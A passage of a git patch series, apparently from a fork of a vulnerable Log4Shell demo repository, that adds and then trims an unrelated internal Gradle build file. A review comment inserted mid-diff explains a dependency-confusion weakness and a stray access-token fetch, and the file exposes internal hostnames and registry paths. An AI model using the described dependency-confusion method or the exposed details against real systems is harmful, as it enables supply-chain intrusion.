From 8ef9c90a29bc8f48a01458beeea8b8afdcd05c01 Mon Sep 17 00:00:00 2001
From: snyk-bot
Date: Thu, 18 Jul 2024 02:24:13 +0000
Subject: [PATCH 01/38] fix: log4shell-goof/log4shell-server/pom.xml to reduce vulnerabilities
The following vulnerabilities are fixed with an upgrade:
- https://snyk.io/vuln/SNYK-JAVA-IOUNDERTOW-7433720
---
 log4shell-goof/log4shell-server/pom.xml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml
index 94de0952b2..593d2298d7 100644
--- a/log4shell-goof/log4shell-server/pom.xml
+++ b/log4shell-goof/log4shell-server/pom.xml
@@ -30,7 +30,7 @@
 io.undertow
 undertow-core
- 2.2.13.Final
+ 2.3.8.Final
 commons-collections
From 513a312ab078f76f726e683a259676634382d896 Mon Sep 17 00:00:00 2001
From: dollav <146855949+dollav@users.noreply.github.com>
Date: Mon, 19 Aug 2024 10:46:59 -0400
Subject: [PATCH 02/38] Create build.gradle
---
 build.gradle | 284 +++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 284 insertions(+)
 create mode 100644 build.gradle
diff --git a/build.gradle b/build.gradle
new file mode 100644
index 0000000000..9b8da9a2b8
--- /dev/null
+++ b/build.gradle
@@ -0,0 +1,284 @@ +buildscript { + ext { + projectName = 'hyrax' + projectVersion = version + buildNumber = System.env.BUILD_NUMBER ?: "1" + arch = 'noarch' + awaitilityVersion = '4.1.0' + commonsCollection4Version = '4.4' + commonsIOVersion = '2.8.0' + commonsLang3Version = '3.12.0' + ehcacheVersion = '3.8.1' + geronimoSpecJavaMail = '1.8.4' + googleCloudBomVersion = '26.42.0' + gradleGitPropertiesVersion = '2.3.2' + httpBuilderVersion = '0.6' + httpClientVersion = '5.2.3' + honeycombOpentelemetryVersion = '1.5.2' + janinoVersion = '3.1.10' + javaxCacheVersion = '1.1.1' + lombokPluginVersion = '5.3.3.3' + mockitoVersion = '3.12.3' + snakeYamlVersion = '1.33' + sonarQubePluginVersion = '2.6.2' + springBootAdminVersion = '3.2.3' + springBootVersion = '3.2.5' + junitVersion = '5.10.1' + testContainerVersion = '1.19.3' + nexus = 'https://nexus.i.xmatters.com/repository/maven-public/' + nexusPublishUsername = project.hasProperty("nexusPublishUsername") ? project.getProperty("nexusPublishUsername") : "" + nexusPublishPassword = project.hasProperty("nexusPublishPassword") ? 
project.getProperty("nexusPublishPassword") : "" + applicationDefaultJvmArgs = [ + "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5006" + ] + dockerOauthToken = 'gcloud -q auth print-access-token'.execute().text.trim() + } + repositories { + maven { url "${nexus}" } + mavenCentral() + mavenLocal() + maven { url "https://plugins.gradle.org/m2/" } + } +} +plugins { + id 'java' + id 'maven-publish' + id 'jacoco' + id 'checkstyle' + id 'org.springframework.boot' version "${springBootVersion}" + id 'org.sonarqube' version "${sonarQubePluginVersion}" + id 'com.gorylenko.gradle-git-properties' version "${gradleGitPropertiesVersion}" + id 'io.freefair.lombok' version "${lombokPluginVersion}" + id 'com.google.cloud.tools.jib' version '3.4.3' +} +java { + toolchain { + languageVersion = JavaLanguageVersion.of(17) + } +} +ext.githash = 'git rev-parse --short HEAD'.execute().text.trim() +ext.virtualHostVersion = version.replaceAll('(\\d+\\.\\d+\\.\\d+)(\\..*)?', '$1').replaceAll("\\.", "-") +jacoco { + toolVersion = "0.8.8" +} +repositories { + mavenLocal() + mavenCentral() + maven { url "${nexus}" } +} +checkstyle { + configFile = new File(rootDir, "/gradle/xMattersFormatAndImportChecks.xml") + toolVersion = "5.9" +} +configurations.configureEach { + resolutionStrategy.cacheChangingModulesFor 0, 'seconds' + exclude module: "spring-boot-starter-tomcat" + exclude module: "log4j" + exclude module: "log4j-api" + exclude module: "android-json" +} +dependencies { + implementation platform("org.springframework.boot:spring-boot-dependencies:${springBootVersion}") + implementation "org.springframework.boot:spring-boot-starter-web" + implementation "org.springframework.boot:spring-boot-starter-jetty" + implementation("org.springframework.boot:spring-boot-starter-webflux") + implementation("org.springframework.boot:spring-boot-starter-oauth2-client") + // tag::actuator[] + implementation "org.springframework.boot:spring-boot-starter-actuator" + // end::actuator[] + 
implementation "org.springframework.boot:spring-boot-starter-security" + implementation 'org.springframework.security:spring-security-oauth2-jose:6.2.1' + constraints { + implementation("org.yaml:snakeyaml:${snakeYamlVersion}") { + because "Upgraded to ${snakeYamlVersion} because of CVE-2022-25857" + } + implementation("ch.qos.logback:logback-core:1.2.13") { + because "Upgraded to 1.2.13 because of CVE-2023-6378" + } + implementation("ch.qos.logback:logback-classic:1.2.13") { + because "Upgraded to 1.2.13 because of CVE-2023-6378" + } + } + implementation("org.springframework.boot:spring-boot-starter-cache") + implementation "org.springframework.boot:spring-boot-starter-cache" + // see http://stackoverflow.com/questions/27935293/spring-ldap-example-requires-persistence for the reason for this + implementation "org.springframework:spring-tx" + implementation "org.codehaus.janino:janino" + implementation("com.xmatters:springbok:${springbokVersion}") { + exclude group: 'org.bouncycastle', module: 'bcprov-jdk15on' + } + implementation("com.xmatters:customer-config-client:4.347.0") + implementation group: "com.xmatters", name: "xm-zuulproxy", version: "${xmZuulProxyVersion}", changing: true + implementation("org.apache.httpcomponents.client5:httpclient5:${httpClientVersion}") + implementation("org.apache.commons:commons-collections4:${commonsCollection4Version}") + implementation("org.apache.commons:commons-lang3:${commonsLang3Version}") + implementation 'io.prometheus:simpleclient:0.16.0' + implementation "de.codecentric:spring-boot-admin-starter-client:${springBootAdminVersion}" + implementation "com.xmatters:spring-boot-starter-xmatters:${xmSpringBootStarterVersion}" + implementation "org.ehcache:ehcache:${ehcacheVersion}" + implementation "javax.cache:cache-api:${javaxCacheVersion}" + implementation "com.fasterxml.jackson.datatype:jackson-datatype-jsr310:2.17.1" + implementation group: 'commons-io', name: 'commons-io', version: "${commonsIOVersion}" + implementation 
'redis.clients:jedis:5.1.2' + implementation "io.honeycomb:honeycomb-opentelemetry-sdk:${honeycombOpentelemetryVersion}" + // Websocket/STOMP + implementation "org.springframework.boot:spring-boot-starter-websocket" + implementation 'org.springframework:spring-messaging' + // Consul client library, may be used for service registration and Key/Value API + implementation('com.ecwid.consul:consul-api:1.4.2') { + exclude group: 'com.google.code.gson', module: 'gson' + } + implementation 'javax.xml.bind:jaxb-api:2.3.1' + implementation 'org.glassfish.jaxb:jaxb-runtime:2.3.1' + // SMTP for email bounce back + implementation "org.apache.geronimo.javamail:geronimo-javamail_1.4_mail:${geronimoSpecJavaMail}" + implementation 'com.sun.activation:javax.activation:1.2.0' + // https://cloud.google.com/java/docs/bom + implementation platform("com.google.cloud:libraries-bom:${googleCloudBomVersion}") + implementation 'com.google.code.gson:gson' + implementation 'com.google.guava:guava' + implementation 'com.google.cloud:google-cloud-pubsub' + implementation 'com.google.cloud:google-cloud-storage' + implementation 'com.google.cloud:google-cloud-tasks' + testImplementation "org.junit.vintage:junit-vintage-engine" + testImplementation "org.springframework.boot:spring-boot-starter-test" + testImplementation "org.mockito:mockito-inline:${mockitoVersion}" + testImplementation "org.awaitility:awaitility:${awaitilityVersion}" + testImplementation "com.github.codemonstur:embedded-redis:1.0.0" + // Needed for the HyraxAuthApiTestController and its associated configuration. 
+ testImplementation('org.springframework.security:spring-security-oauth2-authorization-server:1.2.1') + testImplementation(platform('org.junit:junit-bom:5.10.2')) + testImplementation('org.junit.jupiter:junit-jupiter') + testRuntimeOnly('org.junit.platform:junit-platform-launcher') + testImplementation( + "com.redis:testcontainers-redis:2.0.1", + "org.junit.jupiter:junit-jupiter-api", + "org.junit.jupiter:junit-jupiter-params", + "org.mockito:mockito-junit-jupiter:${mockitoVersion}", + "org.springframework.boot:spring-boot-starter-test", + "org.testcontainers:junit-jupiter:${testContainerVersion}", + "org.testcontainers:testcontainers:${testContainerVersion}", + ) +} +sonarqube { + properties { + property "sonar.projectVersion", version.split('-')[0] + property "sonar.language", "java" + property "sonar.scm.disabled", "true" + property "sonar.core.coveragePlugin", "Jacoco" + } +} +test { + // Checkstyle after test run + finalizedBy = [jacocoTestReport, check] + systemProperties = ["spring.profiles.active": "test, test-overrides"] + useJUnitPlatform() + testLogging { + exceptionFormat = 'full' + events "passed", "skipped", "failed", "standardOut", "standardError" + } +} +tasks.withType(JavaCompile).configureEach { + options.compilerArgs << '-Xlint:all,-cast,-deprecation,-processing,-rawtypes,-serial,-static,-unchecked' << '-Werror' +} +bootRun { + gradle.taskGraph.whenReady { taskGraph -> + if (taskGraph.hasTask(bootRun)) { + def error = ''' +Standalone DEV is no longer supported. Please use dev in the cloud for local development. +To discourage further use of this function, you will be presented with a bad dad joke each time you run it! 
+ +''' + try { + def response = 'curl https://icanhazdadjoke.com/'.execute().text + error += '*' * response.length() + error += '\n' + response + '\n' + error += '*' * response.length() + } catch (e) { + error += 'Error 404 Dad Joke Not Found Searching Dad-A-Base' + } + throw new GradleException(error) + } + } +} +// We want to use the branch name as part of the GCR tag. However we don't want the raw branch name, +// so we strip out symbols and non alpha-numerics. We also strip out git branch text that contains +// remotes/origin or origin/, since we don't care about that. +def sanitize = { input -> + return input.replaceAll("[^A-Za-z0-9.]", "_").toLowerCase().replaceAll("remotes_origin_", "").replaceAll("origin_", ""); +} +def buildNumber = System.env.BUILD_NUMBER ?: "1" +def gcpGitbranch = 'git name-rev --name-only HEAD'.execute().text.trim() +def githash = 'git rev-parse --short HEAD'.execute().text.trim() +def gitbranchTag = sanitize(gcpGitbranch) +def dockerTagShort = "${project.version}-${buildNumber}-${gitbranchTag}-${githash}" +def dockerRepo = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax" +def dockerTag = "${dockerRepo}:${dockerTagShort}" +def buildType = System.env.BUILD_NUMBER ? "JENKINS" : "LOCAL" +//Create gcpBuildVersion.properties file containing build information. This is for the build environment to pass onto +// other upstream callers that are unable to figure out this information on their own. 
+tasks.register('versionProp') { + onlyIf { true } + doLast { + new File("$project.buildDir/gcpBuildVersion.properties").text = """ +APPLICATION="hyrax" +VERSION=${project.version} +BUILD=${buildNumber} +BRANCH=${gcpGitbranch} +GIT_HASH=${githash} +TAG_FULL=${dockerTag} +TAG=${dockerTagShort} +TIMESTAMP=${new Date().format('yyyy-MM-dd HH:mm:ss')} +BUILD_TYPE=${buildType} +""" + } +} +generateGitProperties.finalizedBy versionProp +jib { + from { + image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/base-containers/ibm-semeru-runtimes:xm-open-17.0.10_7-jre-jammy" + } + to { + image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax" + tags = ['latest', dockerTagShort] + } + container { + entrypoint = ["/entrypoint.sh"] + mainClass = "com.xmatters.cloudagent.Application" + ports = ['8083'] + containerizingMode = 'exploded' + environment = [ + SERVICE : "hyrax", + OTEL_JAVAAGENT_LOGGING: "application", + OTEL_JAVAAGENT_DEBUG : "false", + OTEL_METRICS_EXPORTER : "none", + JVM_MEMORY : "-XX:MaxRAMPercentage=50", + JVM_PARAMS : "-XshowSettings:vm -Xshareclasses:cacheDir=/opt/xmatters/jvmclassescache/hyrax,name=xmatters.hyrax,nonfatal -Xscmx300M", + JVM_SSL : "-Djavax.net.ssl.sessionCacheSize=10000 -Dhttps.protocols=TLSv1.2 -Djdk.tls.client.protocols=TLSv1.2", + JVM_GC : "-Xverbosegclog:/var/log/xmatters/hyrax/gc--%pid--%Y-%m-%d_%H-%M-%S.log,5,100000", + HEAP_DUMP : "-XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=/var/log/xmatters/hyrax/heap.dump -Xdump:heap:events=user", + THREAD_DUMP_OUTPUT : "-XX:+UnlockDiagnosticVMOptions -XX:+LogVMOutput -XX:LogFile=/var/log/xmatters/hyrax/thread.out", + LOG_HOME : "/var/log/xmatters/hyrax", + INFO_DEPENDENCIES_XMAPI_VERSION : "${xmApiCompatibility}".toString() + ] + labels = [ + maintainer: "mustafar@xmatters.com", + app : "hyrax", + owner : "Mustafar", + version : "${version}", + role : "api" + ] + extraDirectories { + paths { + path { + from = file('docker/files') + into = '/' + includes = ['entrypoint.sh'] + } + } + 
permissions = [ + '/entrypoint.sh': '755' + ] + } + } +} From e9f3b1d23a49e9fff3c729da6f5eb247e4a5b87c Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:51:23 -0400 Subject: [PATCH 03/38] Update build.gradle --- build.gradle | 15 ++------------- 1 file changed, 2 insertions(+), 13 deletions(-) diff --git a/build.gradle b/build.gradle index 9b8da9a2b8..3abbaff430 100644 --- a/build.gradle +++ b/build.gradle @@ -83,9 +83,7 @@ dependencies { implementation "org.springframework.boot:spring-boot-starter-jetty" implementation("org.springframework.boot:spring-boot-starter-webflux") implementation("org.springframework.boot:spring-boot-starter-oauth2-client") - // tag::actuator[] implementation "org.springframework.boot:spring-boot-starter-actuator" - // end::actuator[] implementation "org.springframework.boot:spring-boot-starter-security" implementation 'org.springframework.security:spring-security-oauth2-jose:6.2.1' constraints { @@ -101,7 +99,6 @@ dependencies { } implementation("org.springframework.boot:spring-boot-starter-cache") implementation "org.springframework.boot:spring-boot-starter-cache" - // see http://stackoverflow.com/questions/27935293/spring-ldap-example-requires-persistence for the reason for this implementation "org.springframework:spring-tx" implementation "org.codehaus.janino:janino" implementation("com.xmatters:springbok:${springbokVersion}") { 
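Review bot: The project-level `repositories` block lists `mavenLocal()` and `mavenCentral()` ahead of the internal Nexus, so every `com.xmatters:*` coordinate (`springbok`, `customer-config-client`, `xm-zuulproxy`, `spring-boot-starter-xmatters`) is looked up on Maven Central first and an attacker-published artifact under that group would be resolved instead of the internal one — the classic dependency-confusion setup, made worse by `xm-zuulproxy` being `changing: true` with `cacheChangingModulesFor 0, 'seconds'`. Pin the internal group to the internal repository with `exclusiveContent` (below), assuming every `com.xmatters` artifact really lives in that Nexus group. Separately, `dockerOauthToken = 'gcloud -q auth print-access-token'.execute().text.trim()` shells out on every Gradle invocation (IDE syncs included) and parks a live GCP access token in `buildscript.ext`, yet nothing in this file reads it — drop it, or resolve it lazily inside the one task that needs it. Finally, if this file was added to this repository unintentionally (nothing else in the series references `hyrax`), be aware that the internal Nexus host, the GCP project and registry paths, and a maintainer e-mail are now in public history.
```groovy
repositories {
    mavenLocal()
    mavenCentral()
    // the internal group must only ever resolve from the internal Nexus
    exclusiveContent {
        forRepository { maven { url "${nexus}" } }
        filter { includeGroupByRegex 'com\\.xmatters(\\..*)?' }
    }
}
```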
@@ -121,19 +118,15 @@ dependencies { implementation group: 'commons-io', name: 'commons-io', version: "${commonsIOVersion}" implementation 'redis.clients:jedis:5.1.2' implementation "io.honeycomb:honeycomb-opentelemetry-sdk:${honeycombOpentelemetryVersion}" - // Websocket/STOMP implementation "org.springframework.boot:spring-boot-starter-websocket" implementation 'org.springframework:spring-messaging' - // Consul client library, may be used for service registration and Key/Value API implementation('com.ecwid.consul:consul-api:1.4.2') { exclude group: 'com.google.code.gson', module: 'gson' } implementation 'javax.xml.bind:jaxb-api:2.3.1' implementation 'org.glassfish.jaxb:jaxb-runtime:2.3.1' - // SMTP for email bounce back implementation "org.apache.geronimo.javamail:geronimo-javamail_1.4_mail:${geronimoSpecJavaMail}" implementation 'com.sun.activation:javax.activation:1.2.0' - // https://cloud.google.com/java/docs/bom implementation platform("com.google.cloud:libraries-bom:${googleCloudBomVersion}") implementation 'com.google.code.gson:gson' implementation 'com.google.guava:guava' @@ -169,7 +162,6 @@ sonarqube { } } test { - // Checkstyle after test run finalizedBy = [jacocoTestReport, check] systemProperties = ["spring.profiles.active": "test, test-overrides"] useJUnitPlatform() @@ -201,9 +193,7 @@ To discourage further use of this function, you will be presented with a bad dad } } } -// We want to use the branch name as part of the GCR tag. However we don't want the raw branch name, -// so we strip out symbols and non alpha-numerics. We also strip out git branch text that contains -// remotes/origin or origin/, since we don't care about that. + def sanitize = { input -> return input.replaceAll("[^A-Za-z0-9.]", "_").toLowerCase().replaceAll("remotes_origin_", "").replaceAll("origin_", ""); } 
@@ -215,8 +205,7 @@ def dockerTagShort = "${project.version}-${buildNumber}-${gitbranchTag}-${githas def dockerRepo = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax" def dockerTag = "${dockerRepo}:${dockerTagShort}" def buildType = System.env.BUILD_NUMBER ? "JENKINS" : "LOCAL" -//Create gcpBuildVersion.properties file containing build information. This is for the build environment to pass onto -// other upstream callers that are unable to figure out this information on their own. + tasks.register('versionProp') { onlyIf { true } doLast { From d52e02dfc5ef83461b4b61fdb8cf52368ee5a4c2 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:53:30 -0400 Subject: [PATCH 04/38] Update build.gradle --- build.gradle | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/build.gradle b/build.gradle index 3abbaff430..8d64c41597 100644 --- a/build.gradle +++ b/build.gradle @@ -138,7 +138,7 @@ dependencies { testImplementation "org.mockito:mockito-inline:${mockitoVersion}" testImplementation "org.awaitility:awaitility:${awaitilityVersion}" testImplementation "com.github.codemonstur:embedded-redis:1.0.0" - // Needed for the HyraxAuthApiTestController and its associated configuration. + testImplementation('org.springframework.security:spring-security-oauth2-authorization-server:1.2.1') testImplementation(platform('org.junit:junit-bom:5.10.2')) testImplementation('org.junit.jupiter:junit-jupiter') @@ -219,7 +219,6 @@ TAG_FULL=${dockerTag} TAG=${dockerTagShort} TIMESTAMP=${new Date().format('yyyy-MM-dd HH:mm:ss')} BUILD_TYPE=${buildType} -""" } } generateGitProperties.finalizedBy versionProp From 98b38f3df98ff044c375ff8f76ae00c47952747e Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:53:56 -0400 Subject: [PATCH 05/38] Update build.gradle --- build.gradle | 1 + 1 file changed, 1 insertion(+) 
diff --git a/build.gradle b/build.gradle index 8d64c41597..b13673a80e 100644 --- a/build.gradle +++ b/build.gradle @@ -219,6 +219,7 @@ TAG_FULL=${dockerTag} TAG=${dockerTagShort} TIMESTAMP=${new Date().format('yyyy-MM-dd HH:mm:ss')} BUILD_TYPE=${buildType} +""" } } generateGitProperties.finalizedBy versionProp From 9e9ec344a684eef0b06fb523b3ebff94d32524c3 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:55:56 -0400 Subject: [PATCH 06/38] Update build.gradle --- build.gradle | 13 ------------- 1 file changed, 13 deletions(-) diff --git a/build.gradle b/build.gradle index b13673a80e..fdbd192f6d 100644 --- a/build.gradle +++ b/build.gradle @@ -208,19 +208,6 @@ def buildType = System.env.BUILD_NUMBER ? "JENKINS" : "LOCAL" tasks.register('versionProp') { onlyIf { true } - doLast { - new File("$project.buildDir/gcpBuildVersion.properties").text = """ -APPLICATION="hyrax" -VERSION=${project.version} -BUILD=${buildNumber} -BRANCH=${gcpGitbranch} -GIT_HASH=${githash} -TAG_FULL=${dockerTag} -TAG=${dockerTagShort} -TIMESTAMP=${new Date().format('yyyy-MM-dd HH:mm:ss')} -BUILD_TYPE=${buildType} -""" - } } generateGitProperties.finalizedBy versionProp jib { From f35a0e417c228cf4ad0c1edc3e8c8b36047201e4 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:56:47 -0400 Subject: [PATCH 07/38] Update build.gradle --- build.gradle | 5 ----- 1 file changed, 5 deletions(-) diff --git a/build.gradle b/build.gradle index fdbd192f6d..9b0c91311e 100644 --- a/build.gradle +++ b/build.gradle 
@@ -176,11 +176,6 @@ tasks.withType(JavaCompile).configureEach { bootRun { gradle.taskGraph.whenReady { taskGraph -> if (taskGraph.hasTask(bootRun)) { - def error = ''' -Standalone DEV is no longer supported. Please use dev in the cloud for local development. -To discourage further use of this function, you will be presented with a bad dad joke each time you run it! - -''' try { def response = 'curl https://icanhazdadjoke.com/'.execute().text error += '*' * response.length() From 4c6aea6a18ef92d7b6dd4b13c0c99a9df5c60889 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:58:14 -0400 Subject: [PATCH 08/38] Update build.gradle --- build.gradle | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/build.gradle b/build.gradle index 9b0c91311e..4caf6122bf 100644 --- a/build.gradle +++ b/build.gradle @@ -29,7 +29,7 @@ buildscript { nexusPublishUsername = project.hasProperty("nexusPublishUsername") ? project.getProperty("nexusPublishUsername") : "" nexusPublishPassword = project.hasProperty("nexusPublishPassword") ? project.getProperty("nexusPublishPassword") : "" applicationDefaultJvmArgs = [ - "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5006" + '-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5006' ] dockerOauthToken = 'gcloud -q auth print-access-token'.execute().text.trim() } From c2d417324f52d5d47fc861de79ae6c5fcb41a176 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:59:00 -0400 Subject: [PATCH 09/38] Update build.gradle --- build.gradle | 21 --------------------- 1 file changed, 21 deletions(-) diff --git a/build.gradle b/build.gradle index 4caf6122bf..32b360e9bd 100644 --- a/build.gradle +++ b/build.gradle 
@@ -218,27 +218,6 @@ jib { mainClass = "com.xmatters.cloudagent.Application" ports = ['8083'] containerizingMode = 'exploded' - environment = [ - SERVICE : "hyrax", - OTEL_JAVAAGENT_LOGGING: "application", - OTEL_JAVAAGENT_DEBUG : "false", - OTEL_METRICS_EXPORTER : "none", - JVM_MEMORY : "-XX:MaxRAMPercentage=50", - JVM_PARAMS : "-XshowSettings:vm -Xshareclasses:cacheDir=/opt/xmatters/jvmclassescache/hyrax,name=xmatters.hyrax,nonfatal -Xscmx300M", - JVM_SSL : "-Djavax.net.ssl.sessionCacheSize=10000 -Dhttps.protocols=TLSv1.2 -Djdk.tls.client.protocols=TLSv1.2", - JVM_GC : "-Xverbosegclog:/var/log/xmatters/hyrax/gc--%pid--%Y-%m-%d_%H-%M-%S.log,5,100000", - HEAP_DUMP : "-XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=/var/log/xmatters/hyrax/heap.dump -Xdump:heap:events=user", - THREAD_DUMP_OUTPUT : "-XX:+UnlockDiagnosticVMOptions -XX:+LogVMOutput -XX:LogFile=/var/log/xmatters/hyrax/thread.out", - LOG_HOME : "/var/log/xmatters/hyrax", - INFO_DEPENDENCIES_XMAPI_VERSION : "${xmApiCompatibility}".toString() - ] - labels = [ - maintainer: "mustafar@xmatters.com", - app : "hyrax", - owner : "Mustafar", - version : "${version}", - role : "api" - ] extraDirectories { paths { path { From 4e39e44ec21bfce06e3e08f85f52e19831c275a9 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 10:59:50 -0400 Subject: [PATCH 10/38] Update build.gradle --- build.gradle | 28 ---------------------------- 1 file changed, 28 deletions(-) diff --git a/build.gradle b/build.gradle index 32b360e9bd..ce3626cb4c 100644 --- a/build.gradle +++ b/build.gradle 
@@ -204,31 +204,3 @@ def buildType = System.env.BUILD_NUMBER ? "JENKINS" : "LOCAL" tasks.register('versionProp') { onlyIf { true } } -generateGitProperties.finalizedBy versionProp -jib { - from { - image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/base-containers/ibm-semeru-runtimes:xm-open-17.0.10_7-jre-jammy" - } - to { - image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax" - tags = ['latest', dockerTagShort] - } - container { - entrypoint = ["/entrypoint.sh"] - mainClass = "com.xmatters.cloudagent.Application" - ports = ['8083'] - containerizingMode = 'exploded' - extraDirectories { - paths { - path { - from = file('docker/files') - into = '/' - includes = ['entrypoint.sh'] - } - } - permissions = [ - '/entrypoint.sh': '755' - ] - } - } -} From 326059a01b50ac0f49d6d25fa2fb4cc809002560 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 11:00:29 -0400 Subject: [PATCH 11/38] Update build.gradle --- build.gradle | 3 --- 1 file changed, 3 deletions(-) diff --git a/build.gradle b/build.gradle index ce3626cb4c..5f8cddd327 100644 --- a/build.gradle +++ b/build.gradle @@ -2,7 +2,6 @@ buildscript { ext { projectName = 'hyrax' projectVersion = version - buildNumber = System.env.BUILD_NUMBER ?: "1" arch = 'noarch' awaitilityVersion = '4.1.0' commonsCollection4Version = '4.4' @@ -26,8 +25,6 @@ buildscript { junitVersion = '5.10.1' testContainerVersion = '1.19.3' nexus = 'https://nexus.i.xmatters.com/repository/maven-public/' - nexusPublishUsername = project.hasProperty("nexusPublishUsername") ? project.getProperty("nexusPublishUsername") : "" - nexusPublishPassword = project.hasProperty("nexusPublishPassword") ? project.getProperty("nexusPublishPassword") : "" applicationDefaultJvmArgs = [ '-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5006' ] From ac1f8fb58bdaeea9e816bab59b7a89bec40646eb Mon Sep 17 00:00:00 2001 
From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 11:01:44 -0400 Subject: [PATCH 12/38] Update build.gradle --- build.gradle | 11 ----------- 1 file changed, 11 deletions(-) diff --git a/build.gradle b/build.gradle index 5f8cddd327..0bb0e0bebf 100644 --- a/build.gradle +++ b/build.gradle @@ -83,17 +83,6 @@ dependencies { implementation "org.springframework.boot:spring-boot-starter-actuator" implementation "org.springframework.boot:spring-boot-starter-security" implementation 'org.springframework.security:spring-security-oauth2-jose:6.2.1' - constraints { - implementation("org.yaml:snakeyaml:${snakeYamlVersion}") { - because "Upgraded to ${snakeYamlVersion} because of CVE-2022-25857" - } - implementation("ch.qos.logback:logback-core:1.2.13") { - because "Upgraded to 1.2.13 because of CVE-2023-6378" - } - implementation("ch.qos.logback:logback-classic:1.2.13") { - because "Upgraded to 1.2.13 because of CVE-2023-6378" - } - } implementation("org.springframework.boot:spring-boot-starter-cache") implementation "org.springframework.boot:spring-boot-starter-cache" implementation "org.springframework:spring-tx" From bbe27d0cd2cdb83abdac96f12308268954dd8ec9 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 11:03:10 -0400 Subject: [PATCH 13/38] Update build.gradle --- build.gradle | 15 --------------- 1 file changed, 15 deletions(-) diff --git a/build.gradle b/build.gradle index 0bb0e0bebf..3370bea62c 100644 --- a/build.gradle +++ b/build.gradle 
@@ -175,18 +175,3 @@ bootRun { } } -def sanitize = { input -> - return input.replaceAll("[^A-Za-z0-9.]", "_").toLowerCase().replaceAll("remotes_origin_", "").replaceAll("origin_", ""); -} -def buildNumber = System.env.BUILD_NUMBER ?: "1" -def gcpGitbranch = 'git name-rev --name-only HEAD'.execute().text.trim() -def githash = 'git rev-parse --short HEAD'.execute().text.trim() -def gitbranchTag = sanitize(gcpGitbranch) -def dockerTagShort = "${project.version}-${buildNumber}-${gitbranchTag}-${githash}" -def dockerRepo = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax" -def dockerTag = "${dockerRepo}:${dockerTagShort}" -def buildType = System.env.BUILD_NUMBER ? "JENKINS" : "LOCAL" - -tasks.register('versionProp') { - onlyIf { true } -} From ead579de06945441d83b7010991627f3d7223c9b Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 11:03:57 -0400 Subject: [PATCH 14/38] Update build.gradle --- build.gradle | 36 +----------------------------------- 1 file changed, 1 insertion(+), 35 deletions(-) diff --git a/build.gradle b/build.gradle index 3370bea62c..5cd7d3917a 100644 --- a/build.gradle +++ b/build.gradle 
@@ -139,39 +139,5 @@ dependencies { "org.testcontainers:testcontainers:${testContainerVersion}", ) } -sonarqube { - properties { - property "sonar.projectVersion", version.split('-')[0] - property "sonar.language", "java" - property "sonar.scm.disabled", "true" - property "sonar.core.coveragePlugin", "Jacoco" - } -} -test { - finalizedBy = [jacocoTestReport, check] - systemProperties = ["spring.profiles.active": "test, test-overrides"] - useJUnitPlatform() - testLogging { - exceptionFormat = 'full' - events "passed", "skipped", "failed", "standardOut", "standardError" - } -} -tasks.withType(JavaCompile).configureEach { - options.compilerArgs << '-Xlint:all,-cast,-deprecation,-processing,-rawtypes,-serial,-static,-unchecked' << '-Werror' -} -bootRun { - gradle.taskGraph.whenReady { taskGraph -> - if (taskGraph.hasTask(bootRun)) { - try { - def response = 'curl https://icanhazdadjoke.com/'.execute().text - error += '*' * response.length() - error += '\n' + response + '\n' - error += '*' * response.length() - } catch (e) { - error += 'Error 404 Dad Joke Not Found Searching Dad-A-Base' - } - throw new GradleException(error) - } - } -} + From b0ab5dc1a7091e6450b1a7af31af397db70536f3 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 11:06:04 -0400 Subject: [PATCH 15/38] Update build.gradle --- build.gradle | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/build.gradle b/build.gradle index 5cd7d3917a..2b67bd55b3 100644 --- a/build.gradle +++ b/build.gradle @@ -63,10 +63,7 @@ repositories { mavenCentral() maven { url "${nexus}" } } -checkstyle { - configFile = new File(rootDir, "/gradle/xMattersFormatAndImportChecks.xml") - toolVersion = "5.9" -} + configurations.configureEach { resolutionStrategy.cacheChangingModulesFor 0, 'seconds' exclude module: "spring-boot-starter-tomcat" From 1957a5b50cab405b1b05b256a5ec905ce4fcc86b Mon Sep 17 00:00:00 2001 
